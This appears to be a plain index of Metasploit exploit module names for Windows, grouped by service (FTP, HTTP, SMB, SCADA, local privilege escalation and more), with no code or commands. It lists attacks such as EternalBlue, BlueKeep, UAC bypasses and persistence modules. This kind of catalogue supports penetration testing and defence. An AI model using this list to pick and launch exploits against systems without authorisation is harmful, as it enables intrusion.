| exploit/windows/ftp/32bitftp_list_reply | exploit/windows/ftp/3cdaemon_ftp_user | exploit/windows/ftp/aasync_list_reply | exploit/windows/ftp/ability_server_stor | exploit/windows/ftp/absolute_ftp_list_bof | exploit/windows/ftp/ayukov_nftp | exploit/windows/ftp/bison_ftp_bof | exploit/windows/ftp/cesarftp_mkd | exploit/windows/ftp/comsnd_ftpd_fmtstr | exploit/windows/ftp/dreamftp_format | exploit/windows/ftp/easyfilesharing_pass | exploit/windows/ftp/easyftp_cwd_fixret | exploit/windows/ftp/easyftp_list_fixret | exploit/windows/ftp/easyftp_mkd_fixret | exploit/windows/ftp/filecopa_list_overflow | exploit/windows/ftp/filewrangler_list_reply | exploit/windows/ftp/freefloatftp_user | exploit/windows/ftp/freefloatftp_wbem | exploit/windows/ftp/freeftpd_pass | exploit/windows/ftp/freeftpd_user | exploit/windows/ftp/ftpgetter_pwd_reply | exploit/windows/ftp/ftppad_list_reply | exploit/windows/ftp/ftpshell51_pwd_reply | exploit/windows/ftp/ftpshell_cli_bof | exploit/windows/ftp/ftpsynch_list_reply | exploit/windows/ftp/gekkomgr_list_reply | exploit/windows/ftp/globalscapeftp_input | exploit/windows/ftp/goldenftp_pass_bof | exploit/windows/ftp/httpdx_tolog_format | exploit/windows/ftp/kmftp_utility_cwd | exploit/windows/ftp/labf_nfsaxe | exploit/windows/ftp/leapftp_list_reply | exploit/windows/ftp/leapftp_pasv_reply | exploit/windows/ftp/ms09_053_ftpd_nlst | exploit/windows/ftp/netterm_netftpd_user | exploit/windows/ftp/odin_list_reply | exploit/windows/ftp/open_ftpd_wbem | exploit/windows/ftp/oracle9i_xdb_ftp_pass | exploit/windows/ftp/oracle9i_xdb_ftp_unlock | exploit/windows/ftp/pcman_put | exploit/windows/ftp/pcman_stor | exploit/windows/ftp/proftp_banner | exploit/windows/ftp/quickshare_traversal_write | exploit/windows/ftp/ricoh_dl_bof | exploit/windows/ftp/sami_ftpd_list | exploit/windows/ftp/sami_ftpd_user | exploit/windows/ftp/sasser_ftpd_port | exploit/windows/ftp/scriptftp_list | exploit/windows/ftp/seagull_list_reply | exploit/windows/ftp/servu_chmod | 
exploit/windows/ftp/servu_mdtm | exploit/windows/ftp/slimftpd_list_concat | exploit/windows/ftp/trellian_client_pasv | exploit/windows/ftp/turboftp_port | exploit/windows/ftp/vermillion_ftpd_port | exploit/windows/ftp/warftpd_165_pass | exploit/windows/ftp/warftpd_165_user | exploit/windows/ftp/wftpd_size | exploit/windows/ftp/winaxe_server_ready | exploit/windows/ftp/wing_ftp_admin_exec | exploit/windows/ftp/wsftp_server_503_mkd | exploit/windows/ftp/wsftp_server_505_xmd5 | exploit/windows/ftp/xftp_client_pwd | exploit/windows/ftp/xlink_client | exploit/windows/ftp/xlink_server | . | games (3) . | exploit/windows/games/mohaa_getinfo | exploit/windows/games/racer_503beta5 | exploit/windows/games/ut2004_secure | . | http (219) . | exploit/windows/http/adobe_robohelper_authbypass | exploit/windows/http/advantech_iview_networkservlet_cmd_inject | exploit/windows/http/advantech_iview_unauth_rce | exploit/windows/http/ajaxpro_deserialization_rce | exploit/windows/http/altn_securitygateway | exploit/windows/http/altn_webadmin | exploit/windows/http/amlibweb_webquerydll_app | exploit/windows/http/apache_activemq_traversal_upload | exploit/windows/http/apache_chunked | exploit/windows/http/apache_mod_rewrite_ldap | exploit/windows/http/apache_modjk_overflow | exploit/windows/http/apache_tika_jp2_jscript | exploit/windows/http/avaya_ccr_imageupload_exec | exploit/windows/http/badblue_ext_overflow | exploit/windows/http/badblue_passthru | exploit/windows/http/bea_weblogic_jsessionid | exploit/windows/http/bea_weblogic_post_bof | exploit/windows/http/bea_weblogic_transfer_encoding | exploit/windows/http/belkin_bulldog | exploit/windows/http/ca_arcserve_rpc_authbypass | exploit/windows/http/ca_igateway_debug | exploit/windows/http/ca_totaldefense_regeneratereports | exploit/windows/http/cayin_xpost_sql_rce | exploit/windows/http/cogent_datahub_command | exploit/windows/http/cogent_datahub_request_headers_bof | exploit/windows/http/coldfusion_fckeditor | 
exploit/windows/http/cyclope_ess_sqli | exploit/windows/http/desktopcentral_deserialization | exploit/windows/http/desktopcentral_file_upload | exploit/windows/http/desktopcentral_statusupdate_upload | exploit/windows/http/disk_pulse_enterprise_bof | exploit/windows/http/disk_pulse_enterprise_get | exploit/windows/http/diskboss_get_bof | exploit/windows/http/disksavvy_get_bof | exploit/windows/http/disksorter_bof | exploit/windows/http/dlink_central_wifimanager_rce | exploit/windows/http/dnn_cookie_deserialization_rce | exploit/windows/http/dup_scout_enterprise_login_bof | exploit/windows/http/dupscts_bof | exploit/windows/http/easychatserver_seh | exploit/windows/http/easyfilesharing_post | exploit/windows/http/easyfilesharing_seh | exploit/windows/http/easyftp_list | exploit/windows/http/edirectory_host | exploit/windows/http/edirectory_imonitor | exploit/windows/http/efs_easychatserver_username | exploit/windows/http/efs_fmws_userid_bof | exploit/windows/http/ektron_xslt_exec | exploit/windows/http/ektron_xslt_exec_ws | exploit/windows/http/ericom_access_now_bof | exploit/windows/http/exchange_chainedserializationbinder_rce | exploit/windows/http/exchange_ecp_dlp_policy | exploit/windows/http/exchange_ecp_viewstate | exploit/windows/http/exchange_proxylogon_rce | exploit/windows/http/exchange_proxynotshell_rce | exploit/windows/http/exchange_proxyshell_rce | exploit/windows/http/ezserver_http | exploit/windows/http/fdm_auth_header | exploit/windows/http/file_sharing_wizard_seh | exploit/windows/http/flexdotnetcms_upload_exec | exploit/windows/http/forticlient_ems_fctid_sqli | exploit/windows/http/fortilogger_arbitrary_fileupload | exploit/windows/http/generic_http_dll_injection | exploit/windows/http/geutebrueck_gcore_x64_rce_bo | exploit/windows/http/git_lfs_rce | exploit/windows/http/gitstack_rce | exploit/windows/http/hp_autopass_license_traversal | exploit/windows/http/hp_imc_bims_upload | exploit/windows/http/hp_imc_java_deserialize | 
exploit/windows/http/hp_imc_mibfileupload | exploit/windows/http/hp_loadrunner_copyfiletoserver | exploit/windows/http/hp_mpa_job_acct | exploit/windows/http/hp_nnm_getnnmdata_hostname | exploit/windows/http/hp_nnm_getnnmdata_icount | exploit/windows/http/hp_nnm_getnnmdata_maxage | exploit/windows/http/hp_nnm_nnmrptconfig_nameparams | exploit/windows/http/hp_nnm_nnmrptconfig_schdparams | exploit/windows/http/hp_nnm_openview5 | exploit/windows/http/hp_nnm_ovalarm_lang | exploit/windows/http/hp_nnm_ovas | exploit/windows/http/hp_nnm_ovbuildpath_textfile | exploit/windows/http/hp_nnm_ovwebhelp | exploit/windows/http/hp_nnm_ovwebsnmpsrv_main | exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil | exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro | exploit/windows/http/hp_nnm_snmp | exploit/windows/http/hp_nnm_snmpviewer_actapp | exploit/windows/http/hp_nnm_toolbar_01 | exploit/windows/http/hp_nnm_toolbar_02 | exploit/windows/http/hp_nnm_webappmon_execvp | exploit/windows/http/hp_nnm_webappmon_ovjavalocale | exploit/windows/http/hp_openview_insight_backdoor | exploit/windows/http/hp_pcm_snac_update_certificates | exploit/windows/http/hp_pcm_snac_update_domain | exploit/windows/http/hp_power_manager_filename | exploit/windows/http/hp_power_manager_login | exploit/windows/http/hp_sitescope_dns_tool | exploit/windows/http/hp_sitescope_runomagentcommand | exploit/windows/http/hpe_sim_76_amf_deserialization | exploit/windows/http/httpdx_handlepeer | exploit/windows/http/httpdx_tolog_format | exploit/windows/http/ia_webmail | exploit/windows/http/ibm_tivoli_endpoint_bof | exploit/windows/http/ibm_tpmfosd_overflow | exploit/windows/http/ibm_tsm_cad_header | exploit/windows/http/icecast_header | exploit/windows/http/integard_password_bof | exploit/windows/http/intersystems_cache | exploit/windows/http/intrasrv_bof | exploit/windows/http/ipswitch_wug_maincfgret | exploit/windows/http/ivanti_avalanche_filestoreconfig_upload | exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce | 
exploit/windows/http/jira_collector_traversal | exploit/windows/http/kaseya_uploader | exploit/windows/http/kaseya_uploadimage_file_upload | exploit/windows/http/kentico_staging_syncserver | exploit/windows/http/kolibri_http | exploit/windows/http/landesk_thinkmanagement_upload_asp | exploit/windows/http/lexmark_markvision_gfd_upload | exploit/windows/http/lg_simple_editor_rce | exploit/windows/http/lg_simple_editor_rce_uploadvideo | exploit/windows/http/mailenable_auth_header | exploit/windows/http/manage_engine_opmanager_rce | exploit/windows/http/manageengine_adaudit_plus_authenticated_rce | exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219 | exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection | exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539 | exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810 | exploit/windows/http/manageengine_adshacluster_rce | exploit/windows/http/manageengine_appmanager_exec | exploit/windows/http/manageengine_apps_mngr | exploit/windows/http/manageengine_connectionid_write | exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966 | exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077 | exploit/windows/http/maxdb_webdbm_database | exploit/windows/http/maxdb_webdbm_get_overflow | exploit/windows/http/mcafee_epolicy_source | exploit/windows/http/mdaemon_worldclient_form2raw | exploit/windows/http/minishare_get_overflow | exploit/windows/http/miniweb_upload_wbem | exploit/windows/http/moveit_cve_2023_34362 | exploit/windows/http/navicopa_get_overflow | exploit/windows/http/netdecision_http_bof | exploit/windows/http/netgear_nms_rce | exploit/windows/http/netmotion_mobility_mvcutil_deserialization | exploit/windows/http/northstar_c2_xss_to_agent_rce | exploit/windows/http/novell_imanager_upload | exploit/windows/http/novell_mdm_lfi | exploit/windows/http/novell_messenger_acceptlang | exploit/windows/http/nowsms | 
exploit/windows/http/nscp_authenticated_rce | exploit/windows/http/oats_weblogic_console | exploit/windows/http/octopusdeploy_deploy | exploit/windows/http/oracle9i_xdb_pass | exploit/windows/http/oracle_beehive_evaluation | exploit/windows/http/oracle_beehive_prepareaudiotoplay | exploit/windows/http/oracle_btm_writetofile | exploit/windows/http/oracle_endeca_exec | exploit/windows/http/oracle_event_processing_upload | exploit/windows/http/osb_uname_jlist | exploit/windows/http/peercast_url | exploit/windows/http/pgadmin_binary_path_api | exploit/windows/http/php_apache_request_headers_bof | exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 | exploit/windows/http/plesk_mylittleadmin_viewstate | exploit/windows/http/plex_unpickle_dict_rce | exploit/windows/http/privatewire_gateway | exploit/windows/http/prtg_authenticated_rce | exploit/windows/http/prtg_authenticated_rce_cve_2023_32781 | exploit/windows/http/psoproxy91_overflow | exploit/windows/http/rabidhamster_r4_log | exploit/windows/http/rejetto_hfs_exec | exploit/windows/http/rejetto_hfs_rce_cve_2024_23692 | exploit/windows/http/sambar6_search_results | exploit/windows/http/sap_configservlet_exec_noauth | exploit/windows/http/sap_host_control_cmd_exec | exploit/windows/http/sapdb_webtools | exploit/windows/http/savant_31_overflow | exploit/windows/http/sepm_auth_bypass_rce | exploit/windows/http/serviio_checkstreamurl_cmd_exec | exploit/windows/http/servu_session_cookie | exploit/windows/http/sharepoint_data_deserialization | exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce | exploit/windows/http/sharepoint_ssi_viewstate | exploit/windows/http/sharepoint_unsafe_control | exploit/windows/http/sharepoint_workflows_xoml | exploit/windows/http/shoutcast_format | exploit/windows/http/shttpd_post | exploit/windows/http/sitecore_xp_cve_2021_42237 | exploit/windows/http/smartermail_rce | exploit/windows/http/softing_sis_rce | exploit/windows/http/solarwinds_fsm_userlogin | 
exploit/windows/http/solarwinds_storage_manager_sql | exploit/windows/http/sonicwall_scrutinizer_sqli | exploit/windows/http/ssrs_navcorrector_viewstate | exploit/windows/http/steamcast_useragent | exploit/windows/http/sws_connection_bof | exploit/windows/http/sybase_easerver | exploit/windows/http/syncbreeze_bof | exploit/windows/http/sysax_create_folder | exploit/windows/http/telerik_rau_deserialization | exploit/windows/http/telerik_report_server_deserialization | exploit/windows/http/tomcat_cgi_cmdlineargs | exploit/windows/http/trackercam_phparg_overflow | exploit/windows/http/trackit_file_upload | exploit/windows/http/trendmicro_officescan | exploit/windows/http/trendmicro_officescan_widget_exec | exploit/windows/http/ultraminihttp_bof | exploit/windows/http/umbraco_upload_aspx | exploit/windows/http/vmware_vcenter_chargeback_upload | exploit/windows/http/vxsrchs_bof | exploit/windows/http/webster_http | exploit/windows/http/ws_ftp_rce_cve_2023_40044 | exploit/windows/http/xampp_webdav_upload_php | exploit/windows/http/xitami_if_mod_since | exploit/windows/http/zentao_pro_rce | exploit/windows/http/zenworks_assetmgmt_uploadservlet | exploit/windows/http/zenworks_uploadservlet | exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce | . | ibm (1) . | exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce | . | iis (9) . | exploit/windows/iis/iis_webdav_scstoragepathfromurl | exploit/windows/iis/iis_webdav_upload_asp | exploit/windows/iis/ms01_023_printer | exploit/windows/iis/ms01_026_dbldecode | exploit/windows/iis/ms01_033_idq | exploit/windows/iis/ms02_018_htr | exploit/windows/iis/ms02_065_msadc | exploit/windows/iis/ms03_007_ntdll_webdav | exploit/windows/iis/msadc | . | imap (16) . 
| exploit/windows/imap/eudora_list | exploit/windows/imap/imail_delete | exploit/windows/imap/ipswitch_search | exploit/windows/imap/mailenable_login | exploit/windows/imap/mailenable_status | exploit/windows/imap/mailenable_w3c_select | exploit/windows/imap/mdaemon_cram_md5 | exploit/windows/imap/mdaemon_fetch | exploit/windows/imap/mercur_imap_select_overflow | exploit/windows/imap/mercur_login | exploit/windows/imap/mercury_login | exploit/windows/imap/mercury_rename | exploit/windows/imap/novell_netmail_append | exploit/windows/imap/novell_netmail_auth | exploit/windows/imap/novell_netmail_status | exploit/windows/imap/novell_netmail_subscribe | . | isapi (5) . | exploit/windows/isapi/ms00_094_pbserver | exploit/windows/isapi/ms03_022_nsiislog_post | exploit/windows/isapi/ms03_051_fp30reg_chunked | exploit/windows/isapi/rsa_webagent_redirect | exploit/windows/isapi/w3who_query | . | ldap (2) . | exploit/windows/ldap/imail_thc | exploit/windows/ldap/pgp_keyserver7 | . | license (4) . | exploit/windows/license/calicclnt_getconfig | exploit/windows/license/calicserv_getconfig | exploit/windows/license/flexnet_lmgrd_bof | exploit/windows/license/sentinel_lm7_udp | . | local (113) . 
| exploit/windows/local/adobe_sandbox_adobecollabsync | exploit/windows/local/agnitum_outpost_acs | exploit/windows/local/alpc_taskscheduler | exploit/windows/local/always_install_elevated | exploit/windows/local/anyconnect_lpe | exploit/windows/local/applocker_bypass | exploit/windows/local/appxsvc_hard_link_privesc | exploit/windows/local/ask | exploit/windows/local/bits_ntlm_token_impersonation | exploit/windows/local/bthpan | exploit/windows/local/bypassuac | exploit/windows/local/bypassuac_comhijack | exploit/windows/local/bypassuac_dotnet_profiler | exploit/windows/local/bypassuac_eventvwr | exploit/windows/local/bypassuac_fodhelper | exploit/windows/local/bypassuac_injection | exploit/windows/local/bypassuac_injection_winsxs | exploit/windows/local/bypassuac_sdclt | exploit/windows/local/bypassuac_silentcleanup | exploit/windows/local/bypassuac_sluihijack | exploit/windows/local/bypassuac_vbs | exploit/windows/local/bypassuac_windows_store_filesys | exploit/windows/local/bypassuac_windows_store_reg | exploit/windows/local/canon_driver_privesc | exploit/windows/local/capcom_sys_exec | exploit/windows/local/comahawk | exploit/windows/local/current_user_psexec | exploit/windows/local/cve_2017_8464_lnk_lpe | exploit/windows/local/cve_2018_8453_win32k_priv_esc | exploit/windows/local/cve_2019_1458_wizardopium | exploit/windows/local/cve_2020_0668_service_tracing | exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move | exploit/windows/local/cve_2020_0796_smbghost | exploit/windows/local/cve_2020_1048_printerdemon | exploit/windows/local/cve_2020_1054_drawiconex_lpe | exploit/windows/local/cve_2020_1313_system_orchestrator | exploit/windows/local/cve_2020_1337_printerdemon | exploit/windows/local/cve_2020_17136 | exploit/windows/local/cve_2021_21551_dbutil_memmove | exploit/windows/local/cve_2021_40449 | exploit/windows/local/cve_2022_21882_win32k | exploit/windows/local/cve_2022_21999_spoolfool_privesc | exploit/windows/local/cve_2022_26904_superprofile | 
exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver | exploit/windows/local/cve_2023_21768_afd_lpe | exploit/windows/local/cve_2023_28252_clfs_driver | exploit/windows/local/cve_2024_30088_authz_basep | exploit/windows/local/dnsadmin_serverlevelplugindll | exploit/windows/local/docker_credential_wincred | exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc | exploit/windows/local/gog_galaxyclientservice_privesc | exploit/windows/local/ikeext_service | exploit/windows/local/ipass_launch_app | exploit/windows/local/lenovo_systemupdate | exploit/windows/local/lexmark_driver_privesc | exploit/windows/local/microfocus_operations_privesc | exploit/windows/local/mov_ss | exploit/windows/local/mqac_write | exploit/windows/local/ms10_015_kitrap0d | exploit/windows/local/ms10_092_schelevator | exploit/windows/local/ms11_080_afdjoinleaf | exploit/windows/local/ms13_005_hwnd_broadcast | exploit/windows/local/ms13_053_schlamperei | exploit/windows/local/ms13_081_track_popup_menu | exploit/windows/local/ms13_097_ie_registry_symlink | exploit/windows/local/ms14_009_ie_dfsvc | exploit/windows/local/ms14_058_track_popup_menu | exploit/windows/local/ms14_070_tcpip_ioctl | exploit/windows/local/ms15_004_tswbproxy | exploit/windows/local/ms15_051_client_copy_image | exploit/windows/local/ms15_078_atmfd_bof | exploit/windows/local/ms16_014_wmi_recv_notif | exploit/windows/local/ms16_016_webdav | exploit/windows/local/ms16_032_secondary_logon_handle_privesc | exploit/windows/local/ms16_075_reflection | exploit/windows/local/ms16_075_reflection_juicy | exploit/windows/local/ms18_8120_win32k_privesc | exploit/windows/local/ms_ndproxy | exploit/windows/local/novell_client_nicm | exploit/windows/local/novell_client_nwfs | exploit/windows/local/nscp_pe | exploit/windows/local/ntapphelpcachecontrol | exploit/windows/local/ntusermndragover | exploit/windows/local/nvidia_nvsvc | exploit/windows/local/panda_psevents | exploit/windows/local/payload_inject | 
exploit/windows/local/persistence | exploit/windows/local/persistence_image_exec_options | exploit/windows/local/persistence_service | exploit/windows/local/plantronics_hub_spokesupdateservice_privesc | exploit/windows/local/powershell_cmd_upgrade | exploit/windows/local/powershell_remoting | exploit/windows/local/ppr_flatten_rec | exploit/windows/local/ps_persist | exploit/windows/local/ps_wmi_exec | exploit/windows/local/pxeexploit | exploit/windows/local/razer_zwopenprocess | exploit/windows/local/registry_persistence | exploit/windows/local/ricoh_driver_privesc | exploit/windows/local/run_as | exploit/windows/local/s4u_persistence | exploit/windows/local/service_permissions | exploit/windows/local/srclient_dll_hijacking | exploit/windows/local/tokenmagic | exploit/windows/local/unquoted_service_path | exploit/windows/local/virtual_box_guest_additions | exploit/windows/local/virtual_box_opengl_escape | exploit/windows/local/vss_persistence | exploit/windows/local/webexec | exploit/windows/local/win_error_cve_2023_36874 | exploit/windows/local/windscribe_windscribeservice_priv_esc | exploit/windows/local/wmi | exploit/windows/local/wmi_persistence | . | lotus (4) . | exploit/windows/lotus/domino_http_accept_language | exploit/windows/lotus/domino_icalendar_organizer | exploit/windows/lotus/domino_sametime_stmux | exploit/windows/lotus/lotusnotes_lzh | . | lpd (4) . | exploit/windows/lpd/hummingbird_exceed | exploit/windows/lpd/niprint | exploit/windows/lpd/saplpd | exploit/windows/lpd/wincomlpd_admin | . | misc (115) . 
| exploit/windows/misc/achat_bof | exploit/windows/misc/actfax_raw_server_bof | exploit/windows/misc/agentxpp_receive_agentx | exploit/windows/misc/ahsay_backup_fileupload | exploit/windows/misc/ais_esel_server_rce | exploit/windows/misc/allmediaserver_bof | exploit/windows/misc/altiris_ds_sqli | exploit/windows/misc/apple_quicktime_rtsp_response | exploit/windows/misc/asus_dpcproxy_overflow | exploit/windows/misc/avaya_winpmd_unihostrouter | exploit/windows/misc/avidphoneticindexer | exploit/windows/misc/bakbone_netvault_heap | exploit/windows/misc/bcaaa_bof | exploit/windows/misc/bigant_server | exploit/windows/misc/bigant_server_250 | exploit/windows/misc/bigant_server_dupf_upload | exploit/windows/misc/bigant_server_sch_dupf_bof | exploit/windows/misc/bigant_server_usv | exploit/windows/misc/bomberclone_overflow | exploit/windows/misc/bopup_comm | exploit/windows/misc/borland_interbase | exploit/windows/misc/borland_starteam | exploit/windows/misc/citrix_streamprocess | exploit/windows/misc/citrix_streamprocess_data_msg | exploit/windows/misc/citrix_streamprocess_get_boot_record_request | exploit/windows/misc/citrix_streamprocess_get_footer | exploit/windows/misc/citrix_streamprocess_get_objects | exploit/windows/misc/cloudme_sync | exploit/windows/misc/commvault_cmd_exec | exploit/windows/misc/crosschex_device_bof | exploit/windows/misc/cve_2022_28381_allmediaserver_bof | exploit/windows/misc/delta_electronics_infrasuite_deserialization | exploit/windows/misc/disk_savvy_adm | exploit/windows/misc/doubletake | exploit/windows/misc/eiqnetworks_esa | exploit/windows/misc/eiqnetworks_esa_topology | exploit/windows/misc/enterasys_netsight_syslog_bof | exploit/windows/misc/eureka_mail_err | exploit/windows/misc/fb_cnct_group | exploit/windows/misc/fb_isc_attach_database | exploit/windows/misc/fb_isc_create_database | exploit/windows/misc/fb_svc_attach | exploit/windows/misc/gh0st | exploit/windows/misc/gimp_script_fu | exploit/windows/misc/hp_dataprotector_cmd_exec 
| exploit/windows/misc/hp_dataprotector_crs | exploit/windows/misc/hp_dataprotector_dtbclslogin | exploit/windows/misc/hp_dataprotector_encrypted_comms | exploit/windows/misc/hp_dataprotector_exec_bar | exploit/windows/misc/hp_dataprotector_install_service | exploit/windows/misc/hp_dataprotector_new_folder | exploit/windows/misc/hp_dataprotector_traversal | exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce | exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce | exploit/windows/misc/hp_imc_uam | exploit/windows/misc/hp_loadrunner_magentproc | exploit/windows/misc/hp_loadrunner_magentproc_cmdexec | exploit/windows/misc/hp_magentservice | exploit/windows/misc/hp_omniinet_1 | exploit/windows/misc/hp_omniinet_2 | exploit/windows/misc/hp_omniinet_3 | exploit/windows/misc/hp_omniinet_4 | exploit/windows/misc/hp_operations_agent_coda_34 | exploit/windows/misc/hp_operations_agent_coda_8c | exploit/windows/misc/hp_ovtrace | exploit/windows/misc/hta_server | exploit/windows/misc/ib_isc_attach_database | exploit/windows/misc/ib_isc_create_database | exploit/windows/misc/ib_svc_attach | exploit/windows/misc/ibm_cognos_tm1admsd_bof | exploit/windows/misc/ibm_director_cim_dllinject | exploit/windows/misc/ibm_tsm_cad_ping | exploit/windows/misc/ibm_tsm_rca_dicugetidentify | exploit/windows/misc/ibm_websphere_java_deserialize | exploit/windows/misc/itunes_extm3u_bof | exploit/windows/misc/ivanti_avalanche_mdm_bof | exploit/windows/misc/landesk_aolnsrvr | exploit/windows/misc/lianja_db_net | exploit/windows/misc/manageengine_eventlog_analyzer_rce | exploit/windows/misc/mercury_phonebook | exploit/windows/misc/mini_stream | exploit/windows/misc/mirc_privmsg_server | exploit/windows/misc/mobile_mouse_rce | exploit/windows/misc/ms07_064_sami | exploit/windows/misc/ms10_104_sharepoint | exploit/windows/misc/netcat110_nt | exploit/windows/misc/nettransport | exploit/windows/misc/nvidia_mental_ray | exploit/windows/misc/plugx | exploit/windows/misc/poisonivy_21x_bof | 
exploit/windows/misc/poisonivy_bof | exploit/windows/misc/poppeeper_date | exploit/windows/misc/poppeeper_uidl | exploit/windows/misc/realtek_playlist | exploit/windows/misc/remote_control_collection_rce | exploit/windows/misc/remote_mouse_rce | exploit/windows/misc/sap_2005_license | exploit/windows/misc/sap_netweaver_dispatcher | exploit/windows/misc/shixxnote_font | exploit/windows/misc/solarwinds_amqp_deserialization | exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write | exploit/windows/misc/splayer_content_type | exploit/windows/misc/stream_down_bof | exploit/windows/misc/talkative_response | exploit/windows/misc/tiny_identd_overflow | exploit/windows/misc/trendmicro_cmdprocessor_addtask | exploit/windows/misc/ufo_ai | exploit/windows/misc/unified_remote_rce | exploit/windows/misc/veeam_one_agent_deserialization | exploit/windows/misc/vmhgfs_webdav_dll_sideload | exploit/windows/misc/webdav_delivery | exploit/windows/misc/wifi_mouse_rce | exploit/windows/misc/windows_rsh | exploit/windows/misc/wireshark_lua | exploit/windows/misc/wireshark_packet_dect | . | mmsp (1) . | exploit/windows/mmsp/ms10_025_wmss_connect_funnel | . | motorola (1) . | exploit/windows/motorola/timbuktu_fileupload | . | mssql (9) . | exploit/windows/mssql/lyris_listmanager_weak_pass | exploit/windows/mssql/ms02_039_slammer | exploit/windows/mssql/ms02_056_hello | exploit/windows/mssql/ms09_004_sp_replwritetovarbin | exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli | exploit/windows/mssql/mssql_clr_payload | exploit/windows/mssql/mssql_linkcrawler | exploit/windows/mssql/mssql_payload | exploit/windows/mssql/mssql_payload_sqli | . | mysql (4) . | exploit/windows/mysql/mysql_mof | exploit/windows/mysql/mysql_start_up | exploit/windows/mysql/mysql_yassl_hello | exploit/windows/mysql/scrutinizer_upload_exec | . | nfs (1) . | exploit/windows/nfs/xlink_nfsd | . | nimsoft (1) . | exploit/windows/nimsoft/nimcontroller_bof | . | nntp (1) . 
| exploit/windows/nntp/ms05_030_nntp | . | novell (9) . | exploit/windows/novell/file_reporter_fsfui_upload | exploit/windows/novell/groupwisemessenger_client | exploit/windows/novell/netiq_pum_eval | exploit/windows/novell/nmap_stor | exploit/windows/novell/zenworks_desktop_agent | exploit/windows/novell/zenworks_preboot_op21_bof | exploit/windows/novell/zenworks_preboot_op4c_bof | exploit/windows/novell/zenworks_preboot_op6_bof | exploit/windows/novell/zenworks_preboot_op6c_bof | . | nuuo (2) . | exploit/windows/nuuo/nuuo_cms_fu | exploit/windows/nuuo/nuuo_cms_sqli | . | oracle (6) . | exploit/windows/oracle/client_system_analyzer_upload | exploit/windows/oracle/extjob | exploit/windows/oracle/osb_ndmp_auth | exploit/windows/oracle/tns_arguments | exploit/windows/oracle/tns_auth_sesskey | exploit/windows/oracle/tns_service_name | . | pop3 (1) . | exploit/windows/pop3/seattlelab_pass | . | postgres (1) . | exploit/windows/postgres/postgres_payload | . | proxy (4) . | exploit/windows/proxy/bluecoat_winproxy_host | exploit/windows/proxy/ccproxy_telnet_ping | exploit/windows/proxy/proxypro_http_get | exploit/windows/proxy/qbik_wingate_wwwproxy | . | rdp (2) . | exploit/windows/rdp/cve_2019_0708_bluekeep_rce | exploit/windows/rdp/rdp_doublepulsar_rce | . | sage (1) . | exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec | . | scada (37) . 
| exploit/windows/scada/abb_wserver_exec | exploit/windows/scada/advantech_webaccess_dashboard_file_upload | exploit/windows/scada/advantech_webaccess_webvrpcs_bof | exploit/windows/scada/citect_scada_odbc | exploit/windows/scada/codesys_gateway_server_traversal | exploit/windows/scada/codesys_web_server | exploit/windows/scada/daq_factory_bof | exploit/windows/scada/delta_ia_commgr_bof | exploit/windows/scada/diaenergie_sqli | exploit/windows/scada/factorylink_csservice | exploit/windows/scada/factorylink_vrn_09 | exploit/windows/scada/ge_proficy_cimplicity_gefebt | exploit/windows/scada/iconics_genbroker | exploit/windows/scada/iconics_webhmi_setactivexguid | exploit/windows/scada/igss9_igssdataserver_listall | exploit/windows/scada/igss9_igssdataserver_rename | exploit/windows/scada/igss9_misc | exploit/windows/scada/igss_exec_17 | exploit/windows/scada/indusoft_webstudio_exec | exploit/windows/scada/moxa_mdmtool | exploit/windows/scada/mypro_cmdexe | exploit/windows/scada/procyon_core_server | exploit/windows/scada/realwin | exploit/windows/scada/realwin_on_fc_binfile_a | exploit/windows/scada/realwin_on_fcs_login | exploit/windows/scada/realwin_scpc_initialize | exploit/windows/scada/realwin_scpc_initialize_rf | exploit/windows/scada/realwin_scpc_txtevent | exploit/windows/scada/rockwell_factorytalk_rce | exploit/windows/scada/scadapro_cmdexe | exploit/windows/scada/sunway_force_control_netdbsrv | exploit/windows/scada/winlog_runtime | exploit/windows/scada/winlog_runtime_2 | exploit/windows/scada/yokogawa_bkbcopyd_bof | exploit/windows/scada/yokogawa_bkesimmgr_bof | exploit/windows/scada/yokogawa_bkfsim_vhfd | exploit/windows/scada/yokogawa_bkhodeq_bof | . | sip (3) . | exploit/windows/sip/aim_triton_cseq | exploit/windows/sip/sipxezphone_cseq | exploit/windows/sip/sipxphone_cseq | . | smb (32) . 
| exploit/windows/smb/cve_2020_0796_smbghost | exploit/windows/smb/generic_smb_dll_injection | exploit/windows/smb/group_policy_startup | exploit/windows/smb/ipass_pipe_exec | exploit/windows/smb/ms03_049_netapi | exploit/windows/smb/ms04_007_killbill | exploit/windows/smb/ms04_011_lsass | exploit/windows/smb/ms04_031_netdde | exploit/windows/smb/ms05_039_pnp | exploit/windows/smb/ms06_025_rasmans_reg | exploit/windows/smb/ms06_025_rras | exploit/windows/smb/ms06_040_netapi | exploit/windows/smb/ms06_066_nwapi | exploit/windows/smb/ms06_066_nwwks | exploit/windows/smb/ms06_070_wkssvc | exploit/windows/smb/ms07_029_msdns_zonename | exploit/windows/smb/ms08_067_netapi | exploit/windows/smb/ms09_050_smb2_negotiate_func_index | exploit/windows/smb/ms10_046_shortcut_icon_dllloader | exploit/windows/smb/ms10_061_spoolss | exploit/windows/smb/ms15_020_shortcut_icon_dllloader | exploit/windows/smb/ms17_010_eternalblue | exploit/windows/smb/ms17_010_psexec | exploit/windows/smb/netidentity_xtierrpcpipe | exploit/windows/smb/psexec | exploit/windows/smb/smb_delivery | exploit/windows/smb/smb_doublepulsar_rce | exploit/windows/smb/smb_relay | 